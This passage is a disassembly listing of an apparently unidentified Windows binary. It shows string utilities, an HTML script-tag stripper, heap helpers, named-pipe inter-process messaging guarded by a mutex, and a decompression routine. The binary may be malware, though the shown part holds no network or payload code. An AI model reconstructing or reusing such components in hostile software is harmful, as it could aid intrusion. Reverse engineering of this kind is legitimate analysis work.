cmp [edx], cl
jz short loc_409019
loc_408FE8: ; CODE XREF: sub_408F6D+75�j
test eax, eax
jnz short loc_408FF0
cmp [edi], al
jz short loc_409000
loc_408FF0: ; CODE XREF: sub_408F6D+7D�j
movsx esi, byte ptr [edx]
movsx ebx, byte ptr [edi]
sub esi, ebx
jnz short loc_40900C
inc edx
inc edi
loc_408FFC: ; CODE XREF: sub_408F6D+6D�j
cmp edx, ecx
jnz short loc_408FDC
loc_409000: ; CODE XREF: sub_408F6D+71�j
; sub_408F6D+81�j
test ecx, ecx
jz short loc_409019
test eax, eax
jz short loc_40902B
xor eax, eax
jmp short loc_40904F
; ---------------------------------------------------------------------------
loc_40900C: ; CODE XREF: sub_408F6D+8B�j
test esi, esi
jl short loc_409026
xor eax, eax
test esi, esi
setnle al
jmp short loc_40904F
; ---------------------------------------------------------------------------
loc_409019: ; CODE XREF: sub_408F6D+79�j
; sub_408F6D+95�j
cmp edi, eax
jnz short loc_409026
xor eax, eax
cmp [edx], al
setnz al
jmp short loc_40904F
; ---------------------------------------------------------------------------
loc_409026: ; CODE XREF: sub_408F6D+A1�j
; sub_408F6D+AE�j
or eax, 0FFFFFFFFh
jmp short loc_40904F
; ---------------------------------------------------------------------------
loc_40902B: ; CODE XREF: sub_408F6D+99�j
cmp edx, ecx
jnz short loc_409037
mov al, [edi]
neg al
sbb eax, eax
jmp short loc_40904F
; ---------------------------------------------------------------------------
loc_409037: ; CODE XREF: sub_408F6D+C0�j
xor eax, eax
inc eax
jmp short loc_40904F
; ---------------------------------------------------------------------------
loc_40903C: ; CODE XREF: sub_408F6D+3F�j
; sub_408F6D+47�j ...
sub eax, esi
loc_40903E: ; CODE XREF: sub_408F6D+1F�j
; sub_408F6D+33�j
xor ecx, ecx
test eax, eax
setnle cl
neg eax
sbb eax, eax
lea ecx, [ecx+ecx-1]
and eax, ecx
loc_40904F: ; CODE XREF: sub_408F6D+9D�j
; sub_408F6D+AA�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_408F6D endp
; =============== S U B R O U T I N E =======================================
sub_409054 proc near ; CODE XREF: sub_407BDB+22A�p
; sub_407BDB+2F9�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov cl, [eax]
push ebx
xor edx, edx
xor bl, bl
cmp cl, 2Dh
jnz short loc_409068
inc bl
jmp short loc_40907E
; ---------------------------------------------------------------------------
loc_409068: ; CODE XREF: sub_409054+E�j
cmp cl, 2Bh
jnz short loc_40907F
jmp short loc_40907E
; ---------------------------------------------------------------------------
loc_40906F: ; CODE XREF: sub_409054+30�j
cmp cl, 39h
jg short loc_409086
imul edx, 0Ah
movsx ecx, cl
lea edx, [edx+ecx-30h]
loc_40907E: ; CODE XREF: sub_409054+12�j
; sub_409054+19�j
inc eax
loc_40907F: ; CODE XREF: sub_409054+17�j
mov cl, [eax]
cmp cl, 30h
jge short loc_40906F
loc_409086: ; CODE XREF: sub_409054+1E�j
test bl, bl
pop ebx
jz short loc_40908D
neg edx
loc_40908D: ; CODE XREF: sub_409054+35�j
mov eax, edx
retn
sub_409054 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409090 proc near ; CODE XREF: sub_407335+88�p
; sub_40B231+38�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
mov esi, [ebp+arg_4]
xor dl, dl
cmp eax, esi
jnb short loc_4090B5
loc_4090A0: ; CODE XREF: sub_409090+1F�j
mov cl, [eax]
cmp cl, 20h
jz short loc_4090AC
cmp cl, 9
jnz short loc_4090B1
loc_4090AC: ; CODE XREF: sub_409090+15�j
inc eax
cmp eax, esi
jb short loc_4090A0
loc_4090B1: ; CODE XREF: sub_409090+1A�j
cmp eax, esi
jb short loc_4090B9
loc_4090B5: ; CODE XREF: sub_409090+E�j
xor al, al
jmp short loc_40910A
; ---------------------------------------------------------------------------
loc_4090B9: ; CODE XREF: sub_409090+23�j
mov cl, [eax]
cmp cl, 22h
jz short loc_4090C5
cmp cl, 27h
jnz short loc_4090C8
loc_4090C5: ; CODE XREF: sub_409090+2E�j
mov dl, cl
inc eax
loc_4090C8: ; CODE XREF: sub_409090+33�j
mov ecx, [ebp+arg_8]
push edi
mov [ecx], eax
jmp short loc_4090F5
; ---------------------------------------------------------------------------
loc_4090D0: ; CODE XREF: sub_409090+67�j
test dl, dl
jz short loc_4090DE
movsx ecx, byte ptr [eax]
movzx edi, dl
cmp ecx, edi
jmp short loc_4090F2
; ---------------------------------------------------------------------------
loc_4090DE: ; CODE XREF: sub_409090+42�j
mov cl, [eax]
cmp cl, 20h
jz short loc_409101
cmp cl, 9
jz short loc_409101
cmp cl, 22h
jz short loc_409101
cmp cl, 27h
loc_4090F2: ; CODE XREF: sub_409090+4C�j
jz short loc_409101
inc eax
loc_4090F5: ; CODE XREF: sub_409090+3E�j
cmp eax, esi
jb short loc_4090D0
test dl, dl
jz short loc_409101
xor al, al
jmp short loc_409109
; ---------------------------------------------------------------------------
loc_409101: ; CODE XREF: sub_409090+53�j
; sub_409090+58�j ...
mov ecx, [ebp+arg_C]
dec eax
mov [ecx], eax
mov al, 1
loc_409109: ; CODE XREF: sub_409090+6F�j
pop edi
loc_40910A: ; CODE XREF: sub_409090+27�j
pop esi
pop ebp
retn
sub_409090 endp
; =============== S U B R O U T I N E =======================================
sub_40910D proc near ; CODE XREF: sub_407BDB+8B�p
; sub_407BDB+CD�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
mov eax, [esp+arg_0]
jmp short loc_40911A
; ---------------------------------------------------------------------------
loc_409113: ; CODE XREF: sub_40910D+11�j
cmp cl, [esp+arg_4]
jz short locret_409122
inc eax
loc_40911A: ; CODE XREF: sub_40910D+4�j
mov cl, [eax]
test cl, cl
jnz short loc_409113
xor eax, eax
locret_409122: ; CODE XREF: sub_40910D+A�j
retn
sub_40910D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409123 proc near ; CODE XREF: .text:0040D574�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
cmp edi, ebx
mov [ebp+var_C], ebx
mov [ebp+var_2], bl
mov [ebp+var_10], ebx
mov [ebp+var_8], ebx
jbe loc_409293
push esi
loc_409145: ; CODE XREF: sub_409123+169�j
cmp [ebp+var_C], 0
mov esi, [ebp+arg_0]
jz short loc_40915C
cmp byte ptr [ebx+esi], 3Eh
jnz short loc_40915C
dec [ebp+var_C]
jmp loc_409283
; ---------------------------------------------------------------------------
loc_40915C: ; CODE XREF: sub_409123+29�j
; sub_409123+2F�j
mov al, [ebx+esi]
cmp al, 3Ch
jnz loc_409232
mov eax, [ebp+var_C]
inc [ebp+var_C]
test eax, eax
jnz loc_409283
sub edi, ebx
cmp [ebp+var_2], al
lea esi, [ebx+esi+1]
jz short loc_4091B1
cmp edi, 7
jbe loc_409283
cmp byte ptr [esi], 2Fh
jnz loc_409283
push 6
push offset aScript ; "script"
inc esi
push esi
call dword_40FC74
test eax, eax
jnz loc_409283
mov [ebp+var_2], al
jmp loc_409283
; ---------------------------------------------------------------------------
loc_4091B1: ; CODE XREF: sub_409123+5B�j
cmp edi, 6
jbe short loc_4091D1
push 6
push offset aScript ; "script"
push esi
call dword_40FC74
test eax, eax
jnz short loc_4091D1
mov [ebp+var_2], 1
jmp loc_409283
; ---------------------------------------------------------------------------
loc_4091D1: ; CODE XREF: sub_409123+91�j
; sub_409123+A3�j
mov [ebp+var_1], 0
loc_4091D5: ; CODE XREF: sub_409123+F0�j
movzx eax, [ebp+var_1]
lea ebx, dword_403158[eax]
movzx ecx, byte ptr [ebx]
cmp edi, ecx
jbe short loc_40920C
push ecx
push ds:off_403148[eax*4]
push esi
call dword_40FC74
test eax, eax
jnz short loc_40920C
movzx eax, byte ptr [ebx]
add esi, eax
mov al, [esi]
cmp al, 2Fh
jz short loc_40921A
cmp al, 20h
jz short loc_40921A
cmp al, 3Eh
jz short loc_40921A
loc_40920C: ; CODE XREF: sub_409123+C1�j
; sub_409123+D4�j
inc [ebp+var_1]
cmp [ebp+var_1], 4
jb short loc_4091D5
mov ebx, [ebp+var_10]
jmp short loc_409283
; ---------------------------------------------------------------------------
loc_40921A: ; CODE XREF: sub_409123+DF�j
; sub_409123+E3�j ...
movzx eax, [ebp+var_1]
mov al, ds:byte_40315C[eax]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov ebx, [ebp+var_10]
mov [edx+ecx], al
jmp short loc_409280
; ---------------------------------------------------------------------------
loc_409232: ; CODE XREF: sub_409123+3E�j
cmp [ebp+var_C], 0
jnz short loc_409283
cmp [ebp+var_2], 0
jnz short loc_409283
cmp al, 0Dh
jz short loc_409283
cmp al, 0Ah
jz short loc_409283
cmp al, 9
jz short loc_409283
cmp al, 26h
jnz short loc_409277
sub edi, ebx
cmp edi, 5
jbe short loc_409277
push 5
push offset dword_403164
lea eax, [ebx+esi+1]
push eax
call dword_40FC74
test eax, eax
jnz short loc_409277
mov eax, [ebp+var_8]
mov byte ptr [eax+esi], 20h
add ebx, 5
jmp short loc_409280
; ---------------------------------------------------------------------------
loc_409277: ; CODE XREF: sub_409123+129�j
; sub_409123+130�j ...
mov al, [ebx+esi]
mov ecx, [ebp+var_8]
mov [ecx+esi], al
loc_409280: ; CODE XREF: sub_409123+10D�j
; sub_409123+152�j
inc [ebp+var_8]
loc_409283: ; CODE XREF: sub_409123+34�j
; sub_409123+4C�j ...
mov edi, [ebp+arg_4]
inc ebx
cmp ebx, edi
mov [ebp+var_10], ebx
jb loc_409145
pop esi
loc_409293: ; CODE XREF: sub_409123+1B�j
mov eax, [ebp+var_8]
sub eax, ebx
add eax, edi
pop edi
pop ebx
leave
retn
sub_409123 endp
; =============== S U B R O U T I N E =======================================
sub_40929E proc near ; CODE XREF: sub_40A813+75�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
mov cl, [esp+arg_0]
mov al, cl
shr al, 4
and cl, 0Fh
cmp al, 9
setle dl
dec dl
and dl, 7
add dl, 30h
add dl, al
mov eax, [esp+arg_4]
mov [eax], dl
cmp cl, 9
setle dl
dec dl
and dl, 7
add dl, 30h
add dl, cl
mov [eax+1], dl
retn
sub_40929E endp
; =============== S U B R O U T I N E =======================================
sub_4092D3 proc near ; CODE XREF: .text:0040C964�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor eax, eax
cmp [esp+arg_4], eax
jbe short loc_4092F3
loc_4092DB: ; CODE XREF: sub_4092D3+1E�j
mov ecx, [esp+arg_0]
mov cl, [eax+ecx]
cmp cl, 30h
jl short loc_4092F6
cmp cl, 39h
jg short loc_4092F6
inc eax
cmp eax, [esp+arg_4]
jb short loc_4092DB
loc_4092F3: ; CODE XREF: sub_4092D3+6�j
mov al, 1
retn
; ---------------------------------------------------------------------------
loc_4092F6: ; CODE XREF: sub_4092D3+12�j
; sub_4092D3+17�j
xor al, al
retn
sub_4092D3 endp
; =============== S U B R O U T I N E =======================================
sub_4092F9 proc near ; CODE XREF: sub_40325F+97�p
; sub_4035F5+71�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jbe short loc_409314
add eax, 2
push eax
push 8
push dword_40FCB4
call dword_40FDCC ; RtlAllocateHeap
retn
; ---------------------------------------------------------------------------
loc_409314: ; CODE XREF: sub_4092F9+6�j
xor eax, eax
retn
sub_4092F9 endp
; =============== S U B R O U T I N E =======================================
sub_409317 proc near ; CODE XREF: sub_40325F+73�p
; sub_40325F+147�p ...
arg_0 = dword ptr 4
cmp [esp+arg_0], 0
jz short locret_409330
push [esp+arg_0]
push 0
push dword_40FCB4
call dword_40FDD4 ; RtlFreeHeap
locret_409330: ; CODE XREF: sub_409317+5�j
retn
sub_409317 endp
; =============== S U B R O U T I N E =======================================
sub_409331 proc near ; CODE XREF: sub_403C06+6F�p
; sub_404624+72�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_8]
test esi, esi
jbe short loc_40934D
mov ecx, [esp+4+arg_0]
mov eax, [esp+4+arg_4]
sub eax, ecx
loc_409344: ; CODE XREF: sub_409331+1A�j
mov dl, [eax+ecx]
mov [ecx], dl
inc ecx
dec esi
jnz short loc_409344
loc_40934D: ; CODE XREF: sub_409331+7�j
pop esi
retn
sub_409331 endp
; =============== S U B R O U T I N E =======================================
sub_40934F proc near ; CODE XREF: sub_4072A7+35�p
; sub_4072A7+53�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_8]
push edi
mov edi, [esp+8+arg_0]
push esi
push [esp+0Ch+arg_4]
push edi
call sub_409331
add esp, 0Ch
lea eax, [edi+esi]
pop edi
pop esi
retn
sub_40934F endp
; =============== S U B R O U T I N E =======================================
sub_40936D proc near ; CODE XREF: sub_40567E+1D�p
; sub_40BAC3+192�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
call sub_4092F9
mov esi, eax
test esi, esi
pop ecx
jnz short loc_409380
pop esi
retn
; ---------------------------------------------------------------------------
loc_409380: ; CODE XREF: sub_40936D+F�j
push [esp+4+arg_4]
push [esp+8+arg_0]
push esi
call sub_409331
add esp, 0Ch
mov eax, esi
pop esi
retn
sub_40936D endp
; =============== S U B R O U T I N E =======================================
sub_409395 proc near ; CODE XREF: sub_40A94C+A�p
; .text:0040CA95�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
test eax, eax
jz short locret_4093AB
loc_40939D: ; CODE XREF: sub_409395+14�j
mov cl, [esp+arg_4]
mov edx, [esp+arg_0]
dec eax
mov [edx+eax], cl
jnz short loc_40939D
locret_4093AB: ; CODE XREF: sub_409395+6�j
retn
sub_409395 endp
; =============== S U B R O U T I N E =======================================
sub_4093AC proc near ; CODE XREF: sub_403F78+AE�p
; sub_404034+EA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_0]
test edi, edi
jz short loc_4093D9
push esi
mov esi, [esp+8+arg_4]
test esi, esi
jz short loc_4093D8
loc_4093BE: ; CODE XREF: sub_4093AC+23�j
dec esi
mov eax, [edi+esi*4]
test eax, eax
jz short loc_4093CD
push eax
call sub_409317
pop ecx
loc_4093CD: ; CODE XREF: sub_4093AC+18�j
test esi, esi
jnz short loc_4093BE
push edi
call sub_409317
pop ecx
loc_4093D8: ; CODE XREF: sub_4093AC+10�j
pop esi
loc_4093D9: ; CODE XREF: sub_4093AC+7�j
pop edi
retn
sub_4093AC endp
; =============== S U B R O U T I N E =======================================
sub_4093DB proc near ; CODE XREF: sub_4095AA+1D�p
; sub_40A95F+14�p
arg_0 = dword ptr 4
push esi
mov esi, eax
push offset a_Pipe ; "\\\\.\\pipe\\"
push esi
call dword_40FD98 ; lstrcpyW
push [esp+4+arg_0]
add esi, 12h
push esi
call dword_40FD98 ; lstrcpyW
pop esi
retn
sub_4093DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4093FA proc near ; DATA XREF: sub_40A95F+8C�o
; sub_41BE85+8C�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push esi
mov esi, [ebp+arg_0]
push edi
push dword ptr [esi+10h]
xor edi, edi
push edi
push offset dword_40FD24
call dword_40FD7C ; CreateMutexW
push dword ptr [esi+8]
mov [ebp+var_10], eax
call dword_40FDBC ; SetEvent
push dword ptr [esi]
call dword_40FE08 ; DisconnectNamedPipe
push edi
push dword ptr [esi+4]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz loc_40956E
push ebx
push 4
pop ebx
loc_409440: ; CODE XREF: sub_4093FA+16D�j
push edi
push dword ptr [esi]
call dword_40FDD8 ; ConnectNamedPipe
cmp eax, 1
jnz loc_40955B
push edi
lea eax, [ebp+var_4]
push eax
push ebx
lea eax, [ebp+var_8]
push eax
push dword ptr [esi]
mov [ebp+var_8], edi
mov [ebp+var_4], edi
mov [ebp+var_C], edi
mov [ebp+arg_0], edi
call dword_40FDF4 ; ReadFile
test eax, eax
jz loc_40954A
cmp [ebp+var_4], ebx
jnz loc_40954A
push edi
lea eax, [ebp+var_4]
push eax
push ebx
lea eax, [ebp+arg_0]
push eax
push dword ptr [esi]
call dword_40FDF4 ; ReadFile
test eax, eax
jz loc_40954A
cmp [ebp+var_4], ebx
jnz loc_40954A
cmp [ebp+arg_0], 0A00000h
jbe short loc_4094B0
mov [ebp+arg_0], edi
loc_4094B0: ; CODE XREF: sub_4093FA+B1�j
cmp [ebp+arg_0], edi
jbe short loc_4094E6
push [ebp+arg_0]
call sub_4092F9
cmp eax, edi
pop ecx
mov [ebp+var_C], eax
jz loc_40954A
push edi
lea ecx, [ebp+var_4]
push ecx
push [ebp+arg_0]
push eax
push dword ptr [esi]
call dword_40FDF4 ; ReadFile
test eax, eax
jz short loc_40954A
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_0]
jnz short loc_40954A
loc_4094E6: ; CODE XREF: sub_4093FA+B9�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_8]
call dword ptr [esi+0Ch]
add esp, 0Ch
push edi
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
push ebx
lea eax, [ebp+var_8]
push eax
push dword ptr [esi]
call dword_40FDF0 ; WriteFile
cmp [ebp+arg_0], 0A00000h
jbe short loc_409518
mov [ebp+arg_0], edi
loc_409518: ; CODE XREF: sub_4093FA+119�j
push edi
lea eax, [ebp+var_4]
push eax
push ebx
lea eax, [ebp+arg_0]
push eax
push dword ptr [esi]
call dword_40FDF0 ; WriteFile
cmp [ebp+arg_0], edi
jz short loc_409542
push edi
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
push [ebp+var_C]
push dword ptr [esi]
call dword_40FDF0 ; WriteFile
loc_409542: ; CODE XREF: sub_4093FA+133�j
push dword ptr [esi]
call dword_40FE00 ; FlushFileBuffers
loc_40954A: ; CODE XREF: sub_4093FA+78�j
; sub_4093FA+81�j ...
push [ebp+var_C]
call sub_409317
pop ecx
push dword ptr [esi]
call dword_40FE08 ; DisconnectNamedPipe
loc_40955B: ; CODE XREF: sub_4093FA+52�j
push edi
push dword ptr [esi+4]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jnz loc_409440
pop ebx
loc_40956E: ; CODE XREF: sub_4093FA+3C�j
push [ebp+var_10]
call dword_40FDAC ; CloseHandle
push dword ptr [esi+8]
call dword_40FDBC ; SetEvent
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_4093FA endp
; =============== S U B R O U T I N E =======================================
sub_409588 proc near ; CODE XREF: .text:004052CE�p
; .text:00405363�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 1F0001h
call dword_40FD80 ; OpenMutexW
test eax, eax
jnz short loc_4095A0
xor al, al
retn
; ---------------------------------------------------------------------------
loc_4095A0: ; CODE XREF: sub_409588+13�j
push eax
call dword_40FDAC ; CloseHandle
mov al, 1
retn
sub_409588 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4095AA proc near ; CODE XREF: sub_4034E8+2D�p
; sub_4034E8+72�p ...
var_218 = byte ptr -218h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 218h
or [ebp+var_10], 0FFFFFFFFh
push ebx
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_218]
mov [ebp+var_1], 1
call sub_4093DB
pop ecx
xor ebx, ebx
mov esi, 0C0000000h
jmp short loc_4095F1
; ---------------------------------------------------------------------------
loc_4095D6: ; CODE XREF: sub_4095AA+61�j
cmp [ebp+var_1], bl
jz loc_40970B
push 0FFFFFFFFh
lea eax, [ebp+var_218]
push eax
call dword_40FDDC ; WaitNamedPipeW
mov [ebp+var_1], bl
loc_4095F1: ; CODE XREF: sub_4095AA+2A�j
push ebx
push ebx
push 3
push ebx
push 3
push esi
lea eax, [ebp+var_218]
push eax
call dword_40FDC0 ; CreateFileW
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4095D6
push ebx
push ebx
lea eax, [ebp+var_8]
push eax
push edi
mov [ebp+var_8], 2
call dword_40FDE0 ; SetNamedPipeHandleState
test eax, eax
jz loc_409704
push ebx
lea eax, [ebp+var_8]
push eax
push 4
pop esi
push esi
lea eax, [ebp+arg_4]
push eax
push edi
call dword_40FDF0 ; WriteFile
test eax, eax
jz loc_409704
push ebx
lea eax, [ebp+var_8]
push eax
push esi
lea eax, [ebp+arg_14]
push eax
push edi
call dword_40FDF0 ; WriteFile
test eax, eax
jz loc_409704
push ebx
lea eax, [ebp+var_8]
push eax
push [ebp+arg_14]
push [ebp+arg_10]
push edi
call dword_40FDF0 ; WriteFile
test eax, eax
jz loc_409704
push ebx
lea eax, [ebp+var_8]
push eax
push esi
lea eax, [ebp+var_10]
push eax
push edi
call dword_40FDF4 ; ReadFile
test eax, eax
jz short loc_409704
cmp [ebp+var_8], esi
jnz short loc_409704
push ebx
lea eax, [ebp+var_8]
push eax
push esi
lea eax, [ebp+var_C]
push eax
push edi
mov [ebp+var_C], ebx
call dword_40FDF4 ; ReadFile
test eax, eax
jz short loc_409700
cmp [ebp+var_8], esi
jnz short loc_409700
cmp [ebp+var_C], ebx
jbe short loc_409704
push [ebp+var_C]
call sub_4092F9
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_4096F3
push ebx
lea eax, [ebp+var_8]
push eax
push [ebp+var_C]
push esi
push edi
call dword_40FDF4 ; ReadFile
test eax, eax
jz short loc_4096F3
mov edx, [ebp+var_C]
cmp edx, [ebp+var_8]
jnz short loc_4096F3
mov ecx, [ebp+arg_8]
cmp ecx, ebx
jz short loc_4096F7
mov eax, [ebp+arg_C]
cmp eax, ebx
jz short loc_4096F7
mov [ecx], esi
mov [eax], edx
jmp short loc_409704
; ---------------------------------------------------------------------------
loc_4096F3: ; CODE XREF: sub_4095AA+117�j
; sub_4095AA+12B�j ...
or [ebp+var_10], 0FFFFFFFFh
loc_4096F7: ; CODE XREF: sub_4095AA+13A�j
; sub_4095AA+141�j
push esi
call sub_409317
pop ecx
jmp short loc_409704
; ---------------------------------------------------------------------------
loc_409700: ; CODE XREF: sub_4095AA+FE�j
; sub_4095AA+103�j
or [ebp+var_10], 0FFFFFFFFh
loc_409704: ; CODE XREF: sub_4095AA+79�j
; sub_4095AA+95�j ...
push edi
call dword_40FDAC ; CloseHandle
loc_40970B: ; CODE XREF: sub_4095AA+2F�j
mov eax, [ebp+var_10]
pop edi
pop esi
pop ebx
leave
retn
sub_4095AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409713 proc near ; CODE XREF: sub_409AD3+37�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
mov ebx, [ebp+arg_0]
push esi
mov esi, [ebp+arg_C]
mov esi, [esi]
xor edx, edx
xor ecx, ecx
push edi
xor eax, eax
mov [ebp+var_8], edx
mov [ebp+var_14], 1
mov [ebp+var_10], esi
loc_409737: ; CODE XREF: sub_409713+6F�j
test ecx, ecx
jbe short loc_409745
dec ecx
mov esi, eax
shr esi, cl
and esi, 1
jmp short loc_409753
; ---------------------------------------------------------------------------
loc_409745: ; CODE XREF: sub_409713+26�j
mov eax, [edx+ebx]
push 1Fh
mov esi, eax
add edx, 4
pop ecx
shr esi, 1Fh
loc_409753: ; CODE XREF: sub_409713+30�j
test esi, esi
mov [ebp+var_4], ecx
jz short loc_409784
cmp edx, [ebp+arg_4]
jnb loc_409920
mov ecx, [ebp+var_10]
cmp [ebp+var_8], ecx
jnb loc_40992F
mov cl, [edx+ebx]
mov esi, [ebp+var_8]
mov edi, [ebp+arg_8]
inc [ebp+var_8]
mov [esi+edi], cl
inc edx
loc_40977F: ; CODE XREF: sub_409713+208�j
mov ecx, [ebp+var_4]
jmp short loc_409737
; ---------------------------------------------------------------------------
loc_409784: ; CODE XREF: sub_409713+45�j
mov [ebp+var_C], 1
loc_40978B: ; CODE XREF: sub_409713+D0�j
test ecx, ecx
jbe short loc_409799
dec ecx
mov esi, eax
shr esi, cl
and esi, 1
jmp short loc_4097A7
; ---------------------------------------------------------------------------
loc_409799: ; CODE XREF: sub_409713+7A�j
mov eax, [edx+ebx]
push 1Fh
mov esi, eax
add edx, 4
pop ecx
shr esi, 1Fh
loc_4097A7: ; CODE XREF: sub_409713+84�j
cmp edx, [ebp+arg_4]
mov edi, [ebp+var_C]
lea esi, [esi+edi*2]
mov [ebp+var_C], esi
jnb loc_409920
cmp esi, 1000002h
ja loc_409936
test ecx, ecx
jbe short loc_4097D3
dec ecx
mov esi, eax
shr esi, cl
and esi, 1
jmp short loc_4097E1
; ---------------------------------------------------------------------------
loc_4097D3: ; CODE XREF: sub_409713+B4�j
mov eax, [edx+ebx]
push 1Fh
mov esi, eax
add edx, 4
pop ecx
shr esi, 1Fh
loc_4097E1: ; CODE XREF: sub_409713+BE�j
test esi, esi
jz short loc_40978B
mov edi, [ebp+var_C]
cmp edi, 2
jnz short loc_4097F2
mov esi, [ebp+var_14]
jmp short loc_409815
; ---------------------------------------------------------------------------
loc_4097F2: ; CODE XREF: sub_409713+D8�j
cmp edx, [ebp+arg_4]
jnb loc_409920
movzx esi, byte ptr [edx+ebx]
add edi, 0FFFFFFFDh
shl edi, 8
add esi, edi
inc edx
cmp esi, 0FFFFFFFFh
jz loc_40993D
inc esi
mov [ebp+var_14], esi
loc_409815: ; CODE XREF: sub_409713+DD�j
test ecx, ecx
mov [ebp+var_C], esi
jbe short loc_409826
dec ecx
mov edi, eax
shr edi, cl
and edi, 1
jmp short loc_409834
; ---------------------------------------------------------------------------
loc_409826: ; CODE XREF: sub_409713+107�j
mov eax, [edx+ebx]
push 1Fh
mov edi, eax
add edx, 4
pop ecx
shr edi, 1Fh
loc_409834: ; CODE XREF: sub_409713+111�j
test ecx, ecx
jbe short loc_409845
dec ecx
mov esi, eax
shr esi, cl
mov [ebp+var_4], ecx
and esi, 1
jmp short loc_409857
; ---------------------------------------------------------------------------
loc_409845: ; CODE XREF: sub_409713+123�j
mov eax, [edx+ebx]
mov esi, eax
add edx, 4
mov [ebp+var_4], 1Fh
shr esi, 1Fh
loc_409857: ; CODE XREF: sub_409713+130�j
lea edi, [esi+edi*2]
test edi, edi
jnz short loc_4098C8
inc edi
loc_40985F: ; CODE XREF: sub_409713+1B1�j
cmp [ebp+var_4], 0
jbe short loc_409874
dec [ebp+var_4]
mov ecx, [ebp+var_4]
mov esi, eax
shr esi, cl
and esi, 1
jmp short loc_409886
; ---------------------------------------------------------------------------
loc_409874: ; CODE XREF: sub_409713+150�j
mov eax, [edx+ebx]
mov esi, eax
add edx, 4
mov [ebp+var_4], 1Fh
shr esi, 1Fh
loc_409886: ; CODE XREF: sub_409713+15F�j
cmp edx, [ebp+arg_4]
lea edi, [esi+edi*2]
jnb loc_409920
cmp edi, [ebp+var_10]
jnb loc_40992F
cmp [ebp+var_4], 0
jbe short loc_4098B0
dec [ebp+var_4]
mov ecx, [ebp+var_4]
mov esi, eax
shr esi, cl
and esi, 1
jmp short loc_4098C2
; ---------------------------------------------------------------------------
loc_4098B0: ; CODE XREF: sub_409713+18C�j
mov eax, [edx+ebx]
mov esi, eax
add edx, 4
mov [ebp+var_4], 1Fh
shr esi, 1Fh
loc_4098C2: ; CODE XREF: sub_409713+19B�j
test esi, esi
jz short loc_40985F
inc edi
inc edi
loc_4098C8: ; CODE XREF: sub_409713+149�j
mov esi, [ebp+var_8]
mov ecx, 0D00h
cmp ecx, [ebp+var_C]
sbb ecx, ecx
neg ecx
add edi, ecx
mov [ebp+var_18], edi
add edi, esi
cmp edi, [ebp+var_10]
ja short loc_40992F
cmp [ebp+var_C], esi
ja short loc_409960
sub esi, [ebp+var_C]
mov edi, [ebp+arg_8]
add esi, [ebp+arg_8]
mov cl, [esi]
mov [ebp+var_C], esi
mov esi, [ebp+var_8]
inc [ebp+var_8]
inc [ebp+var_C]
mov [esi+edi], cl
loc_409902: ; CODE XREF: sub_409713+206�j
mov ecx, [ebp+var_C]
mov esi, [ebp+var_8]
inc [ebp+var_8]
mov cl, [ecx]
mov edi, [ebp+arg_8]
inc [ebp+var_C]
dec [ebp+var_18]
mov [esi+edi], cl
jnz short loc_409902
jmp loc_40977F
; ---------------------------------------------------------------------------
loc_409920: ; CODE XREF: sub_409713+4A�j
; sub_409713+A0�j ...
mov eax, 0FFFFFF37h
loc_409925: ; CODE XREF: sub_409713+221�j
; sub_409713+228�j
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_C]
mov [edx], ecx
jmp short loc_40996A
; ---------------------------------------------------------------------------
